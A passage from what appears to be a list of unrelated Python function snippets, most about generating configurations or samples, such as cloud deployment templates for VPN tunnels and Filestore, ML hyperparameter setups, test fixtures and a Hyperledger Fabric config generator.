the default VPC network for projects requiring stringent\n # network security configurations.\n 'removeDefaultVPC': high_security_network,\n 'createUsageExportBucket': False,\n # Always set up the storage logs and cromwell auth buckets for Firecloud\n 'storageLogsBucket': True,\n 'storageBucketLifecycle': storage_bucket_lifecycle,\n 'cromwellAuthBucket': True\n }\n })\n\n if high_security_network:\n resources.extend(create_high_security_network(context))\n resources.extend(create_firewall(context))\n if private_ip_google_access:\n resources.extend(create_private_google_access_dns_zone(context))\n else:\n resources.extend(create_default_network(context))\n\n if 'pubsubTopic' in context.properties:\n resources.extend(\n create_pubsub_notification(\n context,\n # This is somewhat hacky, but we can't simply collect the name of each\n # collected resource since template call nodes aren't \"real\" resources\n # that can be part of a dependsOn stanza. So instead, we collect the\n # names of all resources that are output by the network (which itself\n # depends on the project). It doesn't seem to be possible to concatenate\n # dependsOn arrays within the reference syntax, otherwise we could make\n # this depend explicitly on all resources from the template nodes.\n depends_on='$(ref.fc-network.resourceNames)',\n status_string='COMPLETED'))\n\n return {'resources': resources}", "def get_configuration_sample(config, root=True):\n if isinstance(config, dict):\n return {\n k: get_configuration_sample(v, root=False)\n for k, v in sorted(config.items())\n }\n elif isinstance(config, list):\n if root:\n return get_configuration_sample(\n config[np.random.randint(len(config))], root=False)\n else:\n return config[np.random.randint(len(config))]\n elif callable(config):\n return config()\n else:\n return config", "def generate_config(test_directories):\n test_dirs_block = '\\n '.join(\n \"- ~+/{}\".format(os.path.join(test_dir, '*'))\n for test_dir in test_directories\n )\n if test_dirs_block:\n test_settings = TESTS_SETTINGS_TEMPLATE.format(\n test_dirs=test_dirs_block\n )\n else:\n test_settings = ''\n config = INIT_TEMPLATE.format(\n test_block=test_settings,\n default_settings='excluding_tests' if test_settings else 'all_files'\n )\n return config", "def generate(ctx: Context):\n try_to_load_agent_config(ctx)", "def create_config(self) -> None:\n pass", "def create_config(self) -> None:\n pass", "def generate_samples(self, n_samples):", "def generate_samples(self, n_samples):", "def generate_config(context):\n\n resources = []\n properties = context.properties\n project_id = properties.get('project', context.env['project'])\n name = properties.get('name', context.env['name'])\n\n resource = {\n 'name': context.env['name'],\n # https://cloud.google.com/filestore/docs/reference/rest/v1beta1/projects.locations.instances/create\n 'type': 'gcp-types/file-v1beta1:projects.locations.instances',\n 'properties': {\n 'parent': 'projects/{}/locations/{}'.format(project_id, properties['location']),\n 'instanceId': name,\n }\n }\n\n optional_props = [\n 'description',\n 'tier',\n 'labels',\n 'fileShares',\n 'networks',\n ]\n\n for prop in optional_props:\n if prop in properties:\n resource['properties'][prop] = properties[prop]\n\n resources.append(resource)\n\n return {\n 'resources':\n resources,\n 'outputs':\n [\n {\n 'name': 'name',\n 'value': name\n },\n {\n 'name': 'fileShares',\n 'value': '$(ref.{}.fileShares)'.format(context.env['name'])\n },\n {\n 'name': 'networks',\n 'value': '$(ref.{}.networks)'.format(context.env['name'])\n }\n ]\n }", "def generate_config(args):\n default_config = resource_string('webrpg', 'scripts/templates/default_config.txt').decode('utf-8')\n if args.sqla_connection_string:\n default_config = default_config.replace('%(sqlalchemy_url)s', args.sqla_connection_string)\n else:\n default_config = default_config.replace('%(sqlalchemy_url)s', get_user_parameter('SQL Alchemy Connection String', 'sqlite:///%(here)s/pyire_test.db'))\n\n with open(args.filename, 'w') as out_f:\n out_f.write(default_config)", "def _init_config(self):\n self.config = self.config_template.specialize()\n print('MMH CONFIG:\\n' + str(self.config))", "def gnupg_gen_key_conf(\n pytestconfig: \"_pytest.config.Config\", tmp_path_factory: TempPathFactory\n) -> Generator[Path, None, None]:\n name = \"gnupg-gen-key.conf\"\n yield from get_user_defined_file(pytestconfig, name)\n yield from get_embedded_file(tmp_path_factory, name=name)", "def generate_conf(self):\n if not os.path.exists(conf_utils.REFSTACK_RESULTS_DIR):\n os.makedirs(conf_utils.REFSTACK_RESULTS_DIR)\n\n self.tempestconf = TempestConf()\n self.tempestconf.generate_tempestconf()", "def test_sampler_building(self):\n with mmtools.utils.temporary_directory() as tmp_dir:\n template_script = self.get_implicit_template_script(tmp_dir)\n template_script['options']['resume_setup'] = True\n default_number_of_iterations = template_script['options']['default_number_of_iterations']\n\n # Add tested samplers.\n template_script['samplers'] = {\n 'my-sampler1': {\n 'type': 'ReplicaExchangeSampler',\n 'number_of_iterations': 9,\n 'replica_mixing_scheme': 'swap-neighbors',\n },\n 'my-sampler2': {\n 'type': 'MultiStateSampler',\n 'locality': 5\n }\n }\n\n def check_default_number_of_iterations(phase, sampler_description):\n if 'number_of_iterations' not in sampler_description:\n assert phase.sampler.number_of_iterations == default_number_of_iterations\n\n # Test that options are passed to the sampler correctly.\n for sampler_id, sampler_description in template_script['samplers'].items():\n template_script['experiments']['sampler'] = sampler_id\n constructor_description = template_script['samplers'][sampler_id]\n yield (self.check_constructor, template_script, constructor_description,\n 'sampler', None, check_default_number_of_iterations)", "def test_simple_config_file(self):\n # create the config file:\n test_name = \"unit_test_test_1\"\n K = \"'key'\"\n fam = 3\n W = 5\n D = 8\n num_circuits = 1\n num_inputs = 1\n config_file_text = \"\\n\".join([\"test_type = RANDOM\",\n \" = \".join([\"K\", str(K)]),\n \" = \".join([\"fam\", str(fam)]),\n \" = \".join([\"W\", str(W)]),\n \" = \".join([\"D\", str(D)]),\n \" = \".join([\"num_circuits\",\n str(num_circuits)]),\n \" = \".join([\"num_inputs\",\n str(num_inputs)]),\n \" = \".join([\"generate\", \"True\"])])\n config_file = StringIO.StringIO(config_file_text)\n # create the parser/generator:\n fho = tfho.test_file_handle_object()\n pag = gen.parser_and_generator(test_name, config_file, fho)\n pag.parse_and_generate()\n # retrieve the test file and check that it is correct:\n test_file = fho.get_file(os.path.join(test_name, \"test.txt\"))\n test_file_text = test_file.getvalue()\n expected_test_file_text = \"\\n\".join(\n [\"KEY\",\n os.path.join(\"stealth\", test_name, \"key\", str(1)),\n \"CIRCUIT\",\n os.path.join(\"stealth\", test_name, \"circuit\", str(1)),\n \"INPUT\",\n os.path.join(\"stealth\", test_name, \"input\", str(1)),\n \"\"])\n self.assertEqual(expected_test_file_text, test_file_text)\n # retrieve the key file and check that it is correct:\n key_file = fho.get_file(os.path.join(test_name, \"key\", \"1\"))\n key_file_text = key_file.getvalue()\n self.assertEqual(K, key_file_text)\n # retrieve the input and check that it is correct:\n input_file = fho.get_file(os.path.join(test_name, \"input\", \"1\"))\n input_file_text = input_file.getvalue()\n # check that input text begins and ends with a bracket:\n self.assertEqual(\"[\", input_file_text[0])\n self.assertEqual(\"]\", input_file_text[-1])\n # check that all bits are 0 or 1:\n for bit in input_file_text[1:-1]:\n self.assertTrue((bit == '0') or (bit == '1'))\n # retrieve the circuit and check that it begins with the correct header:\n circuit_file = fho.get_file(os.path.join(test_name, \"circuit\", \"1\"))\n circuit_file_text = circuit_file.getvalue()\n circuit_header = circuit_file_text.split(\"\\n\")[0]\n (W_string, D_string, fam_string) = circuit_header.split(\",\")\n W_value = int(W_string.split(\"=\")[-1])\n D_value = float(D_string.split(\"=\")[-1])\n fam_value = int(fam_string.split(\"=\")[-1])\n self.assertEqual(W, W_value)\n self.assertEqual(D, D_value)\n self.assertEqual(fam, fam_value)", "def sample_generator(self, sess):\n\n to_return = {\n 'g_sample': self.G_sample_test,\n }\n return sess.run(to_return)", "def test_cfg_example(checker):\n want = labeled.contents(label=\"generate-cfg\")\n got = Path(\"tests/generate.cfg\").read_text(encoding=\"utf-8\")\n checker(want, got)", "def generate_config():\n\n return {\n \"email_subject\": DEFAULT_EMAIL_SUBJECT,\n \"from_email\": DEFAULT_FROM_EMAIL,\n \"to_email\": DEFAULT_TO_EMAIL,\n \"url\": DEFAULT_URL,\n \"start_value\": DEFAULT_START_VALUE,\n \"look_ahead\": DEFAULT_LOOK_AHEAD,\n \"slide_window\": DEFAULT_SLIDE_WINDOW,\n }", "def mkconfig():\n basedir = os.path.join(os.path.expanduser('~'), '.strikepackage')\n\n # Try to populate dirs\n defaultdirs = [os.path.join(basedir, leaf)\n for leaf in ['examples', 'keys', 'templates']]\n\n for dirpath in defaultdirs:\n if not os.path.exists(dirpath):\n try:\n os.makedirs(dirpath, 0755)\n except (os.error, IOError) as ex:\n warn(\"Error while creating default directory: {}\".format(ex))\n\n # Try to place example confs if not present\n exdir = os.path.join(basedir, 'examples')\n exfiles = [(os.path.join(exdir, exfile[0]), exfile[1])\n for exfile in [('config.yaml', config_src),\n ('metadata.jinja2', metadata_src),\n ('userdata.jinja2', userdata_src)]]\n for exfile in exfiles:\n if not os.path.isfile(exfile[0]):\n try:\n with open(exfile[1], 'r') as f:\n src = f.read()\n with open(exfile[0], 'w+') as f:\n f.write(src)\n except IOError as ex:\n warn(\"Error writing example file: {}\".format(ex))", "def get_config_sample_speed():\n # try changing learning rate\n config = get_default_config()\n\n config['train_batch_size'] = 16384\n config['_policies'] = [None, \"from_scratch_sb\", \"pretrained\"]\n config['lr'] = 3e-4\n config['sgd_minibatch_size'] = 4096\n config['num_sgd_iter'] = 4\n config['rollout_fragment_length'] = 100\n config['num_workers'] = tune.grid_search([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])\n\n config['num_envs_per_worker'] = tune.grid_search([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])\n\n # ['humanoid_blocker', 'humanoid'],\n config['_train_policies'] = ['player_1']\n config['num_gpus'] = 0\n config['_train_steps'] = 20\n config[\"batch_mode\"] = \"complete_episodes\"\n\n config['_trainer'] = \"PPO\"\n config['_policy'] = \"PPO\"\n config['_call']['num_samples'] = 1\n config['_call']['resources_per_trial'] = {\n \"custom_resources\": {\"tune_cpu\": tune.sample_from(lambda spec: spec.config.num_workers + 10)}} # upper bound\n\n # config['_run_inline'] = True\n\n return config", "def fixture_sample_single() -> dict:\n _sample = {\n \"fastq\": \"<( zcat read_R1.fastq.gz )\",\n \"single_end\": True,\n \"sample_id\": \"single\",\n }\n return _sample", "def test_single_config(runConfig):\n finalConfig = {}\n finalConfig.update(runConfig.algorithm_config)\n finalConfig.update({\"function\": runConfig.algorithm_function})\n finalConfig.update({\"stop_predicate\": runConfig.stop_predicate})\n finalConfig.update({\"runNumber\": range(1,runConfig.number_of_runs+1)})\n finalConfig.update({\"max_iter\": runConfig.max_iter})\n #finalConfig.update({\"config_start_timestamp\": time.time()})\n #finalConfig.update({\"authors\": [runConfig.authors]})\n \n print(finalConfig)\n \n for element in itertools.product(\n *map(lambda t: [(t[0], x) for x in iterate(t[1])], finalConfig.items())):\n print(element)", "def dump_config_and_makefile(_config):\n experiment_dir = Path(_config['trainer']['storage_dir'])\n makefile_path = Path(experiment_dir) / \"Makefile\"\n\n if not makefile_path.exists():\n from padertorch.contrib.examples.source_separation.tasnet.templates import \\\n MAKEFILE_TEMPLATE_TRAIN\n\n config_path = experiment_dir / \"config.json\"\n pt.io.dump_config(_config, config_path)\n\n makefile_path.write_text(\n MAKEFILE_TEMPLATE_TRAIN.format(\n main_python_path=pt.configurable.resolve_main_python_path(),\n experiment_name=experiment_name,\n eval_python_path=('.'.join(\n pt.configurable.resolve_main_python_path().split('.')[:-1]\n ) + '.evaluate')\n )\n )", "def test_sample(system_generator):\n\n name, test = system_generator()\n print(name)\n\n w_F, w_R, N_k = test.sample([10, 8], mode=\"wFwR\")\n w_F, w_R, N_k = test.sample([1, 1], mode=\"wFwR\")\n w_F, w_R, N_k = test.sample([10, 0], mode=\"wFwR\")\n w_F, w_R, N_k = test.sample([0, 5], mode=\"wFwR\")", "def generate_cfg():\n \n if not os.path.exists(cfg_path):\n os.mkdir(cfg_path)\n \n for img_path in get_template_paths():\n extractor = BlockExtractor(img_path)\n extractor.get_cfg()\n for block in extractor.get_blocks():\n img = BlockParser(img_path, block).block_image()\n #cv.imshow(\"Block\", img)\n #cv.waitKey() & 0xFF", "def generate_configs(num_samples, state_validity_checker, limb_name):\n # Sample locations\n samples = sample_loc(num_samples=num_samples, name=limb_name)\n\n # Transform locations into arrays\n joint_value_array = zip(*samples.values()) # Convert to list, and then transform.\n joint_array = map(lambda joint: dict(zip(samples.keys(), joint)), joint_value_array) # Add key to each config\n\n configs = []\n for index in range(len(joint_array)):\n sample = joint_array[index]\n valid = check_config(sample, state_validity_checker, limb_name + \"_arm\")\n sample[SELF_COLLISION_KEY] = int(valid)\n configs.append(sample)\n return configs", "def generate_samples(self, config, num_samples):\n tic = time.time()\n\n generator = GMM(**config)\n weights = torch.rand(config.num_components)\n generator.component_weights.set_(weights / weights.sum())\n generator.gaussian.means.set_(torch.randn(config.num_components, config.num_features))\n\n if config.covariance == 'diag':\n generator.gaussian.covars.set_(torch.rand(config.num_components, config.num_features))\n\n samples = generator.sample(num_samples)\n\n toc = time.time()\n print(f\"Generated {num_samples:,} samples in {toc-tic:.2f} seconds.\")\n\n return samples", "def generate_config(context):\n\n\n properties = context.properties\n project_id = properties.get('project', context.env['project'])\n\n network = context.properties.get('networkURL', generate_network_uri(\n project_id,\n context.properties.get('network','')\n ))\n target_vpn_gateway = context.env['name'] + '-tvpng'\n esp_rule = context.env['name'] + '-esp-rule'\n udp_500_rule = context.env['name'] + '-udp-500-rule'\n udp_4500_rule = context.env['name'] + '-udp-4500-rule'\n vpn_tunnel = context.env['name'] + '-vpn'\n router_vpn_binding = context.env['name'] + '-router-vpn-binding'\n resources = []\n if 'ipAddress' in context.properties:\n ip_address = context.properties['ipAddress']\n static_ip = ''\n else:\n static_ip = context.env['name'] + '-ip'\n resources.append({\n # The reserved address resource.\n 'name': static_ip,\n # https://cloud.google.com/compute/docs/reference/rest/v1/addresses\n 'type': 'gcp-types/compute-v1:addresses',\n 'properties': {\n 'name': properties.get('name', static_ip),\n 'project': project_id,\n 'region': context.properties['region']\n }\n })\n ip_address = '$(ref.' + static_ip + '.address)'\n\n resources.extend([\n {\n # The target VPN gateway resource.\n 'name': target_vpn_gateway,\n # https://cloud.google.com/compute/docs/reference/rest/v1/targetVpnGateways\n 'type': 'gcp-types/compute-v1:targetVpnGateways',\n 'properties':\n {\n 'name': properties.get('name', target_vpn_gateway),\n 'project': project_id,\n 'network': network,\n 'region': context.properties['region'],\n }\n },\n {\n # The forwarding rule resource for the ESP traffic.\n 'name': esp_rule,\n # https://cloud.google.com/compute/docs/reference/rest/v1/forwardingRules\n 'type': 'gcp-types/compute-v1:forwardingRules',\n 'properties':\n {\n 'name': '{}-esp'.format(properties.get('name')) if 'name' in properties else esp_rule,\n 'project': project_id,\n 'IPAddress': ip_address,\n 'IPProtocol': 'ESP',\n 'region': context.properties['region'],\n 'target': '$(ref.' + target_vpn_gateway + '.selfLink)',\n }\n },\n {\n # The forwarding rule resource for the UDP traffic on port 4500.\n 'name': udp_4500_rule,\n # https://cloud.google.com/compute/docs/reference/rest/v1/forwardingRules\n 'type': 'gcp-types/compute-v1:forwardingRules',\n 'properties':\n {\n 'name': '{}-udp-4500'.format(properties.get('name')) if 'name' in properties else udp_4500_rule,\n 'project': project_id,\n 'IPAddress': ip_address,\n 'IPProtocol': 'UDP',\n 'portRange': 4500,\n 'region': context.properties['region'],\n 'target': '$(ref.' + target_vpn_gateway + '.selfLink)',\n }\n },\n {\n # The forwarding rule resource for the UDP traffic on port 500\n 'name': udp_500_rule,\n # https://cloud.google.com/compute/docs/reference/rest/v1/forwardingRules\n 'type': 'gcp-types/compute-v1:forwardingRules',\n 'properties':\n {\n 'name': '{}-udp-500'.format(properties.get('name')) if 'name' in properties else udp_500_rule,\n 'project': project_id,\n 'IPAddress': ip_address,\n 'IPProtocol': 'UDP',\n 'portRange': 500,\n 'region': context.properties['region'],\n 'target': '$(ref.' + target_vpn_gateway + '.selfLink)',\n }\n },\n\n ])\n router_url_tag = 'routerURL'\n router_name_tag = 'router'\n\n if router_name_tag in context.properties:\n router_url = context.properties.get(router_url_tag, generate_router_uri(\n context.env['project'],\n context.properties['region'],\n context.properties[router_name_tag]))\n # Create dynamic routing VPN\n resources.extend([\n {\n # The VPN tunnel resource.\n 'name': vpn_tunnel,\n # https://cloud.google.com/compute/docs/reference/rest/v1/vpnTunnels\n 'type': 'gcp-types/compute-v1:vpnTunnels',\n 'properties':\n {\n 'name': properties.get('name', vpn_tunnel),\n 'project': project_id,\n 'description':\n 'A vpn tunnel',\n 'ikeVersion':\n 2,\n 'peerIp':\n context.properties['peerAddress'],\n 'region':\n context.properties['region'],\n 'router': router_url,\n 'sharedSecret':\n context.properties['sharedSecret'],\n 'targetVpnGateway':\n '$(ref.' + target_vpn_gateway + '.selfLink)'\n },\n 'metadata': {\n 'dependsOn': [esp_rule,\n udp_500_rule,\n udp_4500_rule]\n }\n }])\n else:\n # Create static routing VPN\n resources.append(\n {\n # The VPN tunnel resource.\n 'name': vpn_tunnel,\n 'type': 'gcp-types/compute-v1:vpnTunnels',\n 'properties': {\n 'name': vpn_tunnel,\n 'description':\n 'A vpn tunnel',\n 'ikeVersion':\n 2,\n 'peerIp':\n context.properties['peerAddress'],\n 'region':\n context.properties['region'],\n 'sharedSecret':\n context.properties['sharedSecret'],\n 'targetVpnGateway':\n '$(ref.' + target_vpn_gateway + '.selfLink)',\n 'localTrafficSelector':\n context.properties['localTrafficSelector'],\n 'remoteTrafficSelector':\n context.properties['remoteTrafficSelector'],\n\n },\n 'metadata': {\n 'dependsOn': [esp_rule, udp_500_rule, udp_4500_rule]\n }\n },\n )\n\n return {\n 'resources':\n resources,\n 'outputs':\n [\n {\n 'name': 'targetVpnGateway',\n 'value': target_vpn_gateway\n },\n {\n 'name': 'staticIp',\n 'value': static_ip\n },\n {\n 'name': 'espRule',\n 'value': esp_rule\n },\n {\n 'name': 'udp500Rule',\n 'value': udp_500_rule\n },\n {\n 'name': 'udp4500Rule',\n 'value': udp_4500_rule\n },\n {\n 'name': 'vpnTunnel',\n 'value': vpn_tunnel\n },\n {\n 'name': 'vpnTunnelUri',\n 'value': '$(ref.'+vpn_tunnel+'.selfLink)'\n }\n ]\n }", "def generate_config(container_data, file_path):\n pass", "def test_generateconfig(self):\n args = mock.Mock()\n args.debug = None\n args.generateconfig = True\n args.config = None\n expected_text = ('Sample configuration file written to sample_config.json\\n'\n \"Replicate the site JSON for each site.\\n\"\n \" Valid values for use_https and local are 'True' and 'False'\\n\"\n \" One site must have local set to 'True'\\n\"\n 'Replicate the export JSON for each exported contract.\\n')\n with mock.patch('sys.stdout', new=StringIO()) as fake_out:\n execute_tool(args)\n self.assertEqual(fake_out.getvalue(), expected_text)", "def sample_configuration_dist(config, root=True, num_samples_per_dist=1):\n if isinstance(config, dict):\n return {\n k: sample_configuration_dist(\n v, root=False, num_samples_per_dist=num_samples_per_dist)\n for k, v in sorted(config.items())\n }\n elif isinstance(config, list) and root:\n return [\n sample_configuration_dist(\n c, root=False, num_samples_per_dist=num_samples_per_dist)\n for c in config\n ]\n elif callable(config):\n return [config() for _ in range(num_samples_per_dist)]\n else:\n return config", "def GenerateConfig(context):\r\n \r\n module = \"frontend\"\r\n cc = config_merger.ConfigContext(context.properties, module)\r\n \r\n return {\r\n 'resources': [{\r\n 'name': 'simple_frontend',\r\n 'type': 'simple_frontend.py',\r\n 'properties': context.properties\r\n }], \r\n 'outputs': [{\r\n 'name': 'env_name',\r\n 'value': context.properties[\"envName\"]\r\n },{\r\n 'name': 'context',\r\n 'value': cc.configs['CONTEXT']\r\n },{\r\n 'name': 'HQ_Address',\r\n 'value': cc.configs['HQ_Address']\r\n },{\r\n 'name': 'ServiceName',\r\n 'value': cc.configs['ServiceName']\r\n },{\r\n 'name': 'versionNR',\r\n 'value': cc.configs['versionNR']\r\n },{\r\n 'name': 'outp_3',\r\n 'value':str(cc.configs)\r\n }]\r\n \r\n }", "def configuration():", "def generator_setup():\n PaaSPureGenerator()", "def setUp(self):\n self.sampler = {\n \"name\": \"samplername\",\n \"backend_name\": \"\",\n \"backend_header\": \"\",\n \"backend_prefix\": \"\",\n \"backend_suffix\": \"\",\n \"backend_footer\": \"\",\n \"ncores\": 2,\n \"threads_per_core\": 1,\n \"omp_enabled\": True,\n \"papi_enabled\": True,\n \"papi_counters_max\": 2,\n \"papi_counters_avail\": (\"C1\", \"C2\", \"C3\"),\n \"kernels\": {\"dgemm\": (\n 'dgemm', 'char*', 'char*', 'int*', 'int*', 'int*', 'double*',\n 'double*', 'int*', 'double*', 'int*', 'double*', 'float*',\n 'int*'\n )},\n \"nt_max\": random.randint(1, 10),\n \"exe\": \"x\"\n }\n self.i = Symbol(\"i\")\n self.j = Symbol(\"j\")\n self.k = Symbol(\"k\")\n self.ns = [random.randint(1, 100) for _ in range(5)]", "def execute(self):\n if self._cli_arguments.get('<samplename>') == 'cfn':\n generate_sample_cfn_module(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'static-angular':\n generate_sample_static_angular(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'static-react':\n generate_sample_static_react(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'sls-py':\n generate_sample_sls_module(self.env_root, 'sls-py')\n elif self._cli_arguments.get('<samplename>') == 'sls-tsc':\n generate_sample_sls_module(self.env_root, 'sls-tsc')\n elif self._cli_arguments.get('<samplename>') == 'stacker':\n generate_sample_stacker_module(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'tf':\n generate_sample_tf_module(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'k8s-cfn-repo':\n generate_sample_k8s_cfn_repo(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'k8s-tf-repo':\n generate_sample_k8s_tf_repo(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'cdk-tsc':\n generate_sample_cdk_tsc_module(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'cdk-py':\n generate_sample_cdk_py_module(self.env_root)\n elif self._cli_arguments.get('<samplename>') == 'cdk-csharp':\n generate_sample_cdk_cs_module(self.env_root)\n else:\n LOGGER.info(\"Available samples to generate:\")\n for i in ['cfn', 'static-angular', 'static-react', 'sls-tsc',\n 'sls-py', 'tf', 'k8s-cfn-repo', 'k8s-tf-repo',\n 'stacker', 'cdk-tsc', 'cdk-py', 'cdk-csharp']:\n print(i)", "def generate_config(self):\n\n # Change crypto-config.yaml and add organizations\n yaml = YAML()\n with open(os.path.join(self.config_path, \"crypto-config-template.yaml\"), \"r\") as crypto_config_file:\n config = yaml.load(crypto_config_file)\n\n config[\"OrdererOrgs\"][0][\"Specs\"] = []\n for orderer_index in range(1, self.num_validators + 1):\n orderer_host, _ = self.experiment.get_peer_ip_port_by_id(orderer_index)\n config[\"OrdererOrgs\"][0][\"Specs\"].append({\n \"Hostname\": \"orderer%d\" % orderer_index,\n \"SANS\": [orderer_host]\n })\n\n config[\"PeerOrgs\"] = []\n for organization_index in range(1, self.num_validators + 1):\n organization_host, _ = self.experiment.get_peer_ip_port_by_id(organization_index)\n organization_config = {\n \"Name\": \"Org%d\" % organization_index,\n \"Domain\": \"org%d.example.com\" % organization_index,\n \"EnableNodeOUs\": True,\n \"Template\": {\n \"Count\": 1,\n \"SANS\": [organization_host]\n },\n \"Users\": {\n \"Count\": 1\n }\n }\n config[\"PeerOrgs\"].append(organization_config)\n\n with open(os.path.join(self.config_path, \"crypto-config.yaml\"), \"w\") as crypto_config_file:\n yaml.dump(config, crypto_config_file)\n\n # Change configtx.yaml\n yaml = YAML()\n with open(os.path.join(self.config_path, \"configtx-template.yaml\"), \"r\") as configtx_file:\n config = yaml.load(configtx_file)\n\n config[\"Profiles\"][\"TwoOrgsChannel\"][\"Application\"][\"Organizations\"] = []\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Consortiums\"][\"SampleConsortium\"][\"Organizations\"] = []\n\n for organization_index in range(1, self.num_validators + 1):\n org_admin = \"Org%dMSP.admin\" % organization_index\n org_peer = \"Org%dMSP.peer\" % organization_index\n org_client = \"Org%dMSP.client\" % organization_index\n organization_host, _ = self.experiment.get_peer_ip_port_by_id(organization_index)\n\n organization_config = {\n \"Name\": \"Org%dMSP\" % organization_index,\n \"ID\": \"Org%dMSP\" % organization_index,\n \"MSPDir\": \"crypto-config/peerOrganizations/org%d.example.com/msp\" % organization_index,\n \"Policies\": {\n \"Readers\": {\n \"Type\": \"Signature\",\n \"Rule\": \"OR('%s', '%s', '%s')\" % (org_admin, org_peer, org_client)\n },\n \"Writers\": {\n \"Type\": \"Signature\",\n \"Rule\": \"OR('%s', '%s')\" % (org_admin, org_peer)\n },\n \"Admins\": {\n \"Type\": \"Signature\",\n \"Rule\": \"OR('%s')\" % (org_admin)\n }\n },\n \"AnchorPeers\": [{\n \"Host\": organization_host,\n \"Port\": 7000 + organization_index\n }]\n }\n\n commented_map = CommentedMap(organization_config)\n commented_map.yaml_set_anchor(\"Org%d\" % organization_index, always_dump=True)\n config[\"Organizations\"].append(commented_map)\n config[\"Profiles\"][\"TwoOrgsChannel\"][\"Application\"][\"Organizations\"].append(commented_map)\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Consortiums\"][\"SampleConsortium\"][\"Organizations\"]\\\n .append(commented_map)\n\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Orderer\"][\"EtcdRaft\"][\"Consenters\"] = []\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Orderer\"][\"Addresses\"] = []\n\n for organization_index in range(1, self.num_validators + 1):\n organization_host, _ = self.experiment.get_peer_ip_port_by_id(organization_index)\n consenter_port = 7000 + organization_index\n consenter_info = {\n \"Host\": organization_host,\n \"Port\": consenter_port,\n \"ClientTLSCert\": \"crypto-config/ordererOrganizations/example.com/orderers/\"\n \"orderer%d.example.com/tls/server.crt\" % organization_index,\n \"ServerTLSCert\": \"crypto-config/ordererOrganizations/example.com/orderers/\"\n \"orderer%d.example.com/tls/server.crt\" % organization_index\n }\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Orderer\"][\"EtcdRaft\"][\"Consenters\"].append(consenter_info)\n config[\"Profiles\"][\"SampleMultiNodeEtcdRaft\"][\"Orderer\"][\"Addresses\"].append(\n \"%s:%d\" % (organization_host, consenter_port))\n\n with open(os.path.join(self.config_path, \"configtx.yaml\"), \"w\") as configtx_file:\n round_trip_dump(config, configtx_file, Dumper=RoundTripDumper)", "def generate_config_template():\n lines = ['# Lines starting with # will be skipped.']\n lines.append('# Only one argument on each line.')\n lines.append('#-s This option is always assumed to be true.')\n lines.append('#-p')\n lines.append('#-m')\n lines.append('#-o')\n lines.append('#-c')\n lines.append('-l')\n lines.append('#-a')\n lines.append('#-d')\n\n with open('export_config.txt', 'wb') as f_new:\n f_new.write('\\r\\n'.join(lines))\n print 'Template generated. Edit this file as you please and call this script '\\\n 'with the -f option enabled.'", "def generate():", "def create_generators(cfg, backbone):\n if cfg.anchor_params:\n if 'small' in cfg.anchor_params:\n anchor_params = AnchorParameters.small\n else:\n anchor_params = None\n else:\n anchor_params = None\n\n common_args = {\n 'batch_size': cfg.batchsize,\n 'config': None,\n 'image_min_side': cfg.image_size[0],\n 'image_max_side': cfg.image_size[1],\n 'filter_annotations_enabled': False,\n 'preprocess_image': backbone.preprocess_image,\n 'normalize_radar': cfg.normalize_radar,\n 'camera_dropout': cfg.dropout_image,\n 'radar_dropout': cfg.dropout_radar,\n 'channels': cfg.channels,\n 'distance': cfg.distance_detection,\n 'sample_selection': cfg.sample_selection,\n 'only_radar_annotated': cfg.only_radar_annotated,\n 'n_sweeps': cfg.n_sweeps,\n 'noise_filter': cfg.noise_filter_cfg,\n 'noise_filter_threshold': cfg.noise_filter_threshold,\n 'noisy_image_method': cfg.noisy_image_method,\n 'noise_factor': cfg.noise_factor,\n 'perfect_noise_filter': cfg.noise_filter_perfect,\n 'radar_projection_height': cfg.radar_projection_height,\n 'noise_category_selection': None if cfg.class_weights is None else cfg.class_weights.keys(),\n 'inference': cfg.inference,\n 'anchor_params': anchor_params,\n }\n\n # create random transform generator for augmenting training data\n if cfg.random_transform:\n transform_generator = random_transform_generator(\n min_rotation=-0.1,\n max_rotation=0.1,\n min_translation=(-0.1, -0.1),\n max_translation=(0.1, 0.1),\n min_shear=-0.1,\n max_shear=0.1,\n min_scaling=(0.9, 0.9),\n max_scaling=(1.1, 1.1),\n flip_x_chance=0.5,\n flip_y_chance=0.0,\n )\n else:\n transform_generator = random_transform_generator(flip_x_chance=0.5)\n\n category_mapping = cfg.category_mapping\n\n if 'nuscenes' in cfg.data_set:\n # import here to prevent unnecessary dependency on nuscenes\n from crfnet.data_processing.generator.nuscenes_generator import NuscenesGenerator\n from nuscenes.nuscenes import NuScenes\n\n if 'mini' in cfg.data_set:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n else:\n try:\n nusc = NuScenes(version='v1.0-trainval', dataroot=cfg.data_path, verbose=True)\n except ValueError:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n\n\n if 'debug' in cfg.scene_selection or 'mini' in cfg.data_set:\n scenes = Scenes.debug\n else:\n scenes = Scenes.default\n\n train_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.train,\n transform_generator=transform_generator,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n shuffle_groups=True,\n group_method='random',\n **common_args\n )\n\n # no dropouts in validation\n common_args['camera_dropout'] = 0\n common_args['radar_dropout'] = 0\n\n validation_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.val,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_night_generator = 